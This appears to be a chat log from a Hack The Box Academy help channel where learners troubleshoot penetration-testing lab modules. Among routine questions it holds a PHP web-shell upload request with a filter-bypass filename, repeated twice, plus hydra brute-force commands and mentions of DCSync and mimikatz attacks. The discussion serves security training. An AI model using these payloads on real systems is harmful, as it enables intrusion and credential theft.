Update 2: Even Remmina and xfreerdp on the PwnBox aren't working. Now what?
Is Linux the best way for hackers?
re-read this section Attacking Domain Trusts - Child -> Parent Trusts - from Windows
im not sure, remmina used to always work for me
Is there any way to check when I completed a module in Academy?
go to badges -> shared link you will find it there
Even using the machine's internal IP and attempting to connect from MSRDP on Target 1 doesn't work.
Everything returns "login failed for display 0." Is there another user and password I need to enumerate first?
can I dm you?
yeah
lol tedious but works, thanks!
Finally figured it out. The problem was I was attempting to use the same password for both machines.
Are we supposed to understand the results in the Service Scanning boxes initially? I just started the pentesting path. I'm reading through it all but I don't understand all of it to be honest.
messaged
Probably a little bit if you did some previous modules, but the more you scan the more you know what you’re looking at
The section breaks it down for you
Understood, thank you.
iirc it should be the same attacks as the examples shown in the section
Dcsync and golden are the only mimikatz commands shown
Don’t use gpt for that when you have the section in front of you
i'm only using gpt because I am big stuck
Gpt should help with explaining some commands and topics but it doesn’t really help in situations like this
The section has everything you need
the linux section has all I need, or the linux section plus the windows sections has all I need?
What part are u on?
After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross.
i have the shell with mimi installed is where I am at currently
You should be using Linux methods on the Linux portion
You don’t need mimikatz for the Linux part
I thought u were on the previous section
Why not secrets dump using the user you made
The user should be an enterprise admin
@novel lynx u get it yet?
i'm retrying now
In XSS phishing assessment, when I want to send the link, I encounter this error: "Issue in sending URL!" I have tried multiple times and reconnected to the VPN connection several times.
Most likely your url then
I checked the link. It works well, but I have the issue with sending.
If we enter an invalid URL, the error message is "Invalid URL." Not "Issue in sending URL!"
Yeah, I just got that message but it worked the second try
I have tried more than 10 times 🙂
Did you restart?
Yes multiple times
are those the correct credentials?
Hmm, yeah idk then, you switched vpns too right?
Yes
Send me the url
We can’t help you with that
I only get that error when I send its own url, so it might be your payload
Sent
hey can i dm
Dude you're awesome it helped so much it was so freaking simple now! have a nice weekend xD
to the people who have completed it, how long did the AD enum and attacks module take you?
10-15 days depends
About bruteforcing - Username Bruteforce section.
+ 0 Try running the same exercise on the question from the previous section, to learn how to brute force for users.
The command I am running is:
hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -p amormio -u -f 94.237.53.113 -s 30445 http-get /
This is identical to what seems to be expected from the module. I'm actually going a little nuts here because this seems like such a stupid thing to be stuck on.
5 days
huh
It’s really long
around 2wks
did you spend 24 hours a day on it or what
if he got prior knowledge it will be easy for him
oh yeah that's true
Nah but I was familiar with most of it until the ACL and cross forest stuff
Just stuff from tcm
did the pnpt?
Pjpt
still have a second retake of the pnpt, was mega unprepared and tried doing the full asessment during a workweek lol
They upped the price by 200 😭
That's crazy... dang.
pjpt+ soon
hi, im starting the linux privilege escalation module, but im stuck in the first lab, environment enumeration. the question is "Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer" but i searched all the files and i cant find the flag, can anyone help me pls?
what do you mean
i already uploaded a web shell in that path, but i dont get in when i try to navigate there in the url
Certain files arent seen unless you choose to see them
neither shell.php/.jpg
does the module tell you how to enumerate upload directories? if so have you tried those?
what do you mean
i don't know what module you're on so it's hard to help you
if you uploaded the shell maybe try looking at the source code
File Upload Attacks
whitelist filters
I have already managed to identify how to bypass file type restrictions in the backend. I added a webshell to those payloads, but I don't know how to access it. I tried encoding it to URL but I still can't do it.
shell code?
im telling you no and asking why
Hi! I'm stuck in the web enumeration module. When I try to run some of the commands I only get errors; I don't know if I'm doing something wrong or what. If anyone can give me a hand I'd appreciate it.
only english taco
Ok
and when i go to root, it said i dont have permission
you haven’t escalated your privileges. thats why
i'd review the source code first
did you review the source code on the page you upload the file to?
in order to reach your uploaded web shell, you have to know the file path to use in the url to trigger it
Hi everyone, I doing the Linux fundamentals module - Navigation section, for the What is the index number of the "sudoers" file in the "/etc" directory?
I keep receiving an error to my answer. I've used the right command to see the index number but it's not taking my answer.
omg i know
u 99% wont find it manually
and to view the source code of the website you’re uploading to, you just use Ctrl+U
u need to make a find command that looks for the string HTB in each file
i already view the source code
so what you're expecting us to just tell you the answer?
@fathom pendant
pretty bad way of soliciting help from strangers imo
tom, we essentially gave you the answer without giving you the silver spoon that goes with it and you're not accepting it
maybe take the advice and review something you may have overlooked
why are you spitting that out?
take a breather lil bro
I don't know if you're looking for attention but Marcielee is not a stranger, has always helped in modules
yo let’s not let modules devolve into an argument
so did you find it?
marcie very likely also will not straight up give you the answer.
go back over the module if you have to. we told you what you needed to do.
I'm not looking for the answer, I'm looking for someone with the ability to help and understand the questions, not just to be told to do something I've already done.
bro why not just ctrl+f and search for the name of your webshell?
good work. but delete that cause it’s still a spoiler
For the index number of a specific file in a directory, there are two commands to use, ls or stat, correct? Am I missing a command?
pretty sure that was the only way to find it tbh
With all due respect, if you don't know about a topic, just say so, don't waste my time.
@elfin dust delete the whole thing you wrote. it’s still a spoiler cause it gives away where the flag is lol
Help? With what? In principle, all you have done is ask me to do things that I have already done. I am still waiting for some kind of help beyond trying to improvise support.
stop
ok, sorry, but why into that directory? i dont understand it
what exactly are u looking for? from what i seen they gave good directions
they just wanted you to use the find command correctly, it was way too deep to be common knowledge
maybe i can find it with linpeas? i thought that directory isnt important to find files that contain sensitive information, i thought /etc is important, /root is important, but why that directory?
linpeas wouldnt flag a string like that
it was there just for us
ok tks for all the tips guys (Y)
yes, in fact it is a good direction, but I don't know what I've been asking: why I can't access the routes where a web shell is already written in a PHP-executable format. It's not as simple as remembering the name, because the evasion includes characters that confuse the behavior of the page, but even URL-encoding the characters to avoid their ambiguity I still can't get the file on the web page. What makes me angry is that they tell me what I already did and then treat me as if I were looking for the answer. If I were looking for it I would have asked; I am asking something specific. If they are going to improvise and waste time, it is better that they don't do it and do things right.
Hi everyone, For the Linux fundamentals module - Navigation section, for the What is the index number of the "sudoers" file in the "/etc" directory?
Is this question asking for an index number in a different context, such as a file's position in a directory listing or something else?
then its the wrong extension
It is literally the same name and file extension as the one I uploaded to the server, that is why it concerns me
let me show you
i mean that maybe that extension wasnt gonna work anyway
and find another set
```
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://ip:port/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------395223586137621495382826115921
Content-Length: 268
Origin: http://ip:port
DNT: 1
Connection: close
Sec-GPC: 1
-----------------------------395223586137621495382826115921
Content-Disposition: form-data; name="uploadFile"; filename="shell.php.\\.jpg"
Content-Type: image/jpeg
<?php system($_REQUEST['cmd']); ?>
-----------------------------395223586137621495382826115921--
```
and this is the response:
```
HTTP/1.1 200 OK
Date: Thu, 26 Sep 2024 01:03:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8
File successfully uploaded
```
http://ip:port/profile_images/shell.php.%5C%5C.jpg?cmd=ls I GET NO FOUND
yeah if you look in the source u can see it doesnt appear
you can assume that slashes just wont work in this case
AD path - MSSQL module first part; not sure why this is not working - tried several variants including updated impacket. can ping and nmap the machine, service (mssql) is up on 1433, can rdp in and go about it that method but curious what the issue is here
Not Found
The requested URL was not found on this server.
Apache/2.4.41 (Ubuntu) Server at ip Port port
hey yall. i'm in AD Enumeration & Attacks Skills Assessment Part 2 Question 7. I'm trying to use mssqlclient.py but i keep getting a TimeoutError message. i used python3 and -windows-auth. are there any alternatives yall recommend?
its def there but the file wont load correctly with slashes
tack on a -windows-auth at the end of that command and let me know if that works
if you haven’t already and it’s just cut off in the screenshot
i did try it, but that too was unsuccessful. Strange because I've used this many times and seem to regularly have an issue @hushed sail
ls -i
You finally got to my initial question and you didn't get tangled up like them, but then how do I do that? There is also: shell.php%2F.jpg (shell.php/.jpg) which also uploads the file correctly, but the same problem occurs, I can't access the file, do you have any clue? I know I'm close.
try extension combinations that dont use slash
there's a slash in the username
Tried that but the answer is not being taken when I submit it
they gave you a script in the section, just edit what you do or dont need @uneven cairn
The fuzzing result gives me only successful file upload results with the payloads I showed (they have slashes)
sorry
you let me got something, thank you im done here
is that an issue? I've used it before successfully and HackTricks and what not recommend domain/username:pass@ip
u sure?
on the sudoers file?
Yes I tried ls -I /etc/sudoers and stat /etc/sudoers
does it start with 1 and end with 7
No, starts with 1 and ends with 8
try restarting the machine
Okay trying it again
Yeah it's still the same outcome
send a screenshot in dm
Any help with my question above?
have u tried impacket?
impacket-mssqlclient
should probably use htb.local instead, and you don't have to give a domain name for mssql client
Gonna try it
ik but i thought those were older versions instead of aliases
nah the impacket-x stuff is installed with apt which is not really the right way to install and can cause problems, and those are usually the older version since the apt repo is not updated regularly
yeah, that would make more sense
That didn't work either 😩
you're goin through a pivot right?
or is this all on the attack machine
Well that's the thing. Apparently im supposed to use mssqlclient on the jump box, and I'm also supposed to start http.server on the same jump box...which is confusing as heck. At least those are what the notes from a buddy of mine that completed the entire path 🤷🏽♂️
so are u doing everything from the jumpbox or tunneling stuff through it from your host machine?
The only time I tunneled was when I SSH'd into HTB-student. That was the only way I can get xfreerdp to work.
I just don't see what my issue is, now on updated impacket in a venv 😮
But no, not everything I'm doing is from the jump box.
send a pic of the commands in dm
Give me maybe about five minutes
wait are you sure student is the right username to use and not just for rdp
in the mssqlclient command earlier in the section another username was used
hmmmmmmmmmm I'll check
Hello Xre0uS, would you please help me with my issue?
but that's module 1 in the section
yeah ws_dev
x_x
```
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://ip:port/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------395223586137621495382826115921
Content-Length: 268
Origin: http://ip:port
DNT: 1
Connection: close
Sec-GPC: 1
-----------------------------395223586137621495382826115921
Content-Disposition: form-data; name="uploadFile"; filename="shell.php.\\.jpg"
Content-Type: image/jpeg
<?php system($_REQUEST['cmd']); ?>
-----------------------------395223586137621495382826115921--
```
and this is the response:
```
HTTP/1.1 200 OK
Date: Thu, 26 Sep 2024 01:03:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8
File successfully uploaded
```
http://ip:port/profile_images/shell.php.%5C%5C.jpg?cmd=ls I GET NO FOUND
i thought u got it?
all im gonna say is that it requires no special characters
I was trying to add more file extensions to the script to see if other combinations would work.
if you get not found that means the file isn't being uploaded correctly or it's not being saved to the server with the name you expect
and also this ^
"shell.$ext.$ext" ?
remove the . before the $ext and you will only need one $ext since they already add the other for you
i got pump just from doing labs
sitting on chair for hours not that bad
no nitro but :gigachad:
fr
anyone done the bruteforcing modules recently?
hydra is giving me
[ERROR] target ssh://83.136.254.37:43889/ does not support password authentication (method reply 4).
searches online + in the discord for other people running into this problem suggested they were still using port 22 for ssh.
built hydra from source and i'm using the correct port, a little confused
cmd im using is /tools/hydra/hydra -L {name}-usern.txt -P {name-pws}.txt ssh://83.136.254.37:43889
which module and which section exactly? also there's an error right there that says password authentication isn't supported.
because you suggested that password authentication isn't supported, that was a proof that it is
it prompted me for a password - so it's supported. same host in #modules message
ok double check your hydra command
¯\_(ツ)_/¯
you don't need to show all that
i'd suggest reviewing the service authentication brute forcing section
?
to get to this point in the module i've already done a hydra brute force against ssh
bruteforcing SSH is usually a pain in the butt anyway no?
Any other service (easier to bruteforce) open that could potentially do pwd reuse?
(I've not done the module yet, so I'm just spewing an idea :p )
i've bruteforced ssh with hydra doing boxes on htb all the time, this is just bizarre and i feel like its due to the nonstandard ssh port and for some reason hydra won't take the custom port.
compare your notes with the section that goes over it, specifically the command used.
try medusa
not trying to be combative
i literally do not see what i am doing differently at all. -u -f are unrelated to this error
maybe try restarting the target then
try patator
also what is /tools/hydra/hydra, instead of just 'hydra'
pretty sure it's trying to access port 22 instead of the target port
please read what i said in the first message asking for help - i built it from source to make sure there wasn't a problem with the kali version of hydra
yeah, thats what i believe too.
there's another way to specify the port
i specified -s but my messages are being deleted and got the same error
Have you tried to add -vV to check connection messages?
Might give you details on what it is doing behind the scenes
really strange.
[DATA] attacking ssh://83.136.254.37:43889/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://harry@83.136.254.37:43889
[ERROR] target ssh://83.136.254.37:43889/ does not support password authentication (method reply 4).
port seems to be correct
maybe its just for that specific user?
Why are you using username when specifying the hostname for hydra?
ahhhhh
You are already giving the username list using -L flag
I'm not, it's part of the module - you create a custom user list. that's the -vV output; and the first line in my username list to spray is harry
wireshark time
I would reset the box first before looking at packets hahaha
lmao
When I’m sure something should work and it doesn’t, I try pwnbox 😅
That's a great suggestion too
vehement hatred of pwnbox
If it doesn’t work there, then I’m sure that I’m wrong 
Would isolate that it's your hydra build at least
I also hate pwnbox, but it does have its uses
It’s a bruteforcing module
thought so too but after attempting the first login and adding 'yes' to known hosts its the same deal
very annoying thanks everyone
Check pwnbox and report please, now we're involved 😄
im still beginning in this field, wish i could help
(Also I'm finishing the AD module and the bruteforce login one is coming soon haha)
Which module are you working on?
im about to finish Attacking Common Services in cpts path
Nice!
thanks
I just tried the same command and password authentication is supported. You should reset the target machine.
@storm elk quick unrelated question: how are the badges (not the certs ones, or mods, obviously) awarded (Community contributor etc....) ?
Worked on pwnbox - absolute utter blasphemy
hahahahahaha
now I have to worry about having to fix whatever the hell is wrong with my hydra installation
which really shouldn't be the case, building it from source
what distro are you running?
Linux kali 6.8.11-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.8.11-1kali2 (2024-05-30) x86_64 GNU/Linux
reinstalled hydra, built it from source, googled a bit
hopefully this helps someone who searches module chat history if they run into the same problem
Community Contributors are selected/ voted for : #📣-announcements message
for what its worth, parrotbox is using Hydra v9.4 and i have Hydra v9.6dev (c) installed. it's probably due to something with the hydra versions
Thanks
Which other worlds would you like to know about?
what about the seadris badge and the banned badge
Lol oops. I meant which other badges would you like to know about
I will just get the CPTS badge, that'll be a good start
What does seadris badge look like?
That’s a beautiful one
@haughty stirrup
or the alt @river lichen
I don't see any badges for BreadTora
On another note, did you find the PW?
yep, make sure to read the hint
I did, but it's quite slow because of ssh..
my lists are this long:
make sure all the lines conform to the password policy
I already trimmed the PW list, from what I saw It was just the same rules as in the module
yeah, it'll take a little while
Do you think -u will do any good? running with it currently.
Also thought of using the same username format as in the module e.g h.potter and let that run for itself
Hi! Where can I go.
I mean for DANTE Labs suggestions.
I'm not able to understand what to do, I mean after pivoting etc
.. 😭
Hello
Please read #welcome . It will explain how to identify your account. You will receive access to #1263635449335910531 after that
yes, thats the only way it worked in my experience
172.16.4.0/23 has a range of 172.16.4.0 - 172.16.5.255
you said it yourself that the pivot host has an ip of 172.16.5.129/255.255.254.0, so autoroute is opening that subnet
then you should review the networking section
Hey, im trying to verify my mail and i have this error: "we think you are a bot, try submitting the form". how can i fix it? I cant access my account at this point
I just use the regular gpt4
Try a different browser. If that does not help, contact support via the website 🙂
Can you tell me what I'm doing wrong?
Module Attacking Enterprise Networks
you add the subdomain to your /etc/hosts
?
yep
Any thoughts that could be wrong?
no idea
Maybe if I wait a while the system won't detect me as a bot?
Can you try changing 'X-Custom-IP-Authorization' to 127.0.0.1?
yes 1 sec
Cloudflare can be tricky. When I try a different browser it usually works. Or have you been using a VPN provider?
and maybe you should add a space after :
you already fixed it, nice
I just found the same problem on the forum before that, but there was no solution there either.
I tried with my phone, with my laptop (not using VPNs), Chrome and Safari, and nothing 😦 and the pending verification email never gets sent to my email
Are you using pwnbox?
Just checked on my instance and it's working as expected.
no, I'm using my Kali
Try with a different browser or updating the browser if it's outdated
Double-check your /etc/hosts entries and additionally, you can try sending GET/POST requests to see if they time out too
GET/POST Work fine.
Initially, everything goes well, and at the moment with TRACK it breaks down
It's just that the first answer I get is the same as in the module.
After adding X-Custom-IP-Authorization IP at the end do you press enter? Just to make sure there are 2 lines empty after it
In this request I can see 9 & 10 are empty so it works
After adding you have to make sure it's the same
No, there was no blank line. Everything is already working, thank you.
Awesome!
nothing worked
Firewall and IDS/IPS Evasion - Medium Lab
@tribal plinth
@shell ore
ok it worked with -PE -sC flag
Why are you randomly pinging people
How can I solve this error? I am getting this problem in the "VACCINE" machine.
This channel is not for machines
anybody please help out?
Only modules
try #boxes
Sure! Thanks
this AD module goes on foooorever...
i better hit 50% hacker level by the time it's over with
Question: Is Linux Fundamentals module out of date? Seems like a file that is assumed to exist once upon a time doesn't anymore...
I found myself a medium walkthrough that had the answers, but even replicating their commands didn't yield what they got... and their answers work
the tree cmd? it's not installed by default
yo guys, I don't understand something: my user htb-student has read/write permission on the share Department Shares but I can't write my legit.lnk file, why??? https://academy.hackthebox.com/module/67/section/630
oh sorry, file, not cmd, yeah there's a few small discrepancies
not tree... the literal .conf file or .bak file isn't there... and my .log count should be 32 but when I actually run the command chain it is 82... lol
I figure there must be some reason behind it
permissions might not be inherited in subdirectories
I tried to write the file at c:/ but got an error
This Command Injections Skills Assessment is killing me. I found a working payload last night to test whoami. Got up to finish finding the flag and building off of that. Now my payload does not work.
however in the IT path the user htb-student has access :/ ...
IT & CS 101
hello, I am stuck at this question. It didn't ask to start a machine or anything.
I have started the machine and used the IP in the image but got the result "Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn"
I tried the command (sudo nmap 10.129.2.18 -Pn -O) and it shows nothing about the OS. Sorry, I'm new.
Restarted like 5 times if that's what you mean
it is asking you to get the answer from the last scan result. read it thoroughly and the text above it to get the answer
thank you, I still didn't get it so I guessed and the answer was correct, but I couldn't find out where it said the answer.
check the hint, you will find the methodology that helps with determining the host os from the ICMP ping
I can't access the hint because I am using the student subscription, but thank you, I will do research about ICMP ping later
hints are available for student's sub
guided mode is what isn't available
The whole time I've been clicking it nothing happened, now I see🫠
Found I need to wake up more before attempting these things. I was targeting the wrong request this morning.
John the Ripper is returning "No password hashes loaded (see FAQ)" on attempt to load the mssqlsvc hash in the AD Enum > Cross-Forest Trust Abuse from Windows section — any idea why this would be the case?
First hash I've ever had this problem with; everything else has worked properly with JtR.
Hash file was generated using the /outfile: option in Rubeus for context
you usually get that error if you load the wrong type of hash from the hash type you identified in your command
Which one is it supposed to be? I'm using krb5tgs which has worked on every other hash in the module except this one.
why are you using john instead of hashcat
i usually just identify the hash and use hashcat
Because Hashcat isn't as accurate as it should be on my 6-year-old Polaris GPUs, despite me having 6 of them lined up.
Hashcat seems to work better on my M1 MacBook Pro; trying that next.
report back if works
Worked like a charm. Yeah, for whatever reason this was the first hash that I absolutely needed Hashcat for; everything else worked fine with John up until this point.
Don't spoil username 🙂
Have you clicked around in the file explorer ?
(Can't remember if username is given by the assessment or not, apologies if it is and it's not a spoil)
Got it haha ?
ya imma stupid
Most stupid flag of the modules hahaha
I was expecting another long step etc... and then oO
mate you're really spoiling the heck out of AEN, most people would like to do it blind, avoid spoilers please
also the module itself is a walkthrough, if you're stuck, you can refer to that
Question (not related to modules, but still relevant here I think):
Does anyone have a terminal trick to delete/replace arguments in a command?
I know I can use variables like export IP = so that in my history, commands come up with $IP, but what about a way to just select and "paste over" ? Any ideas?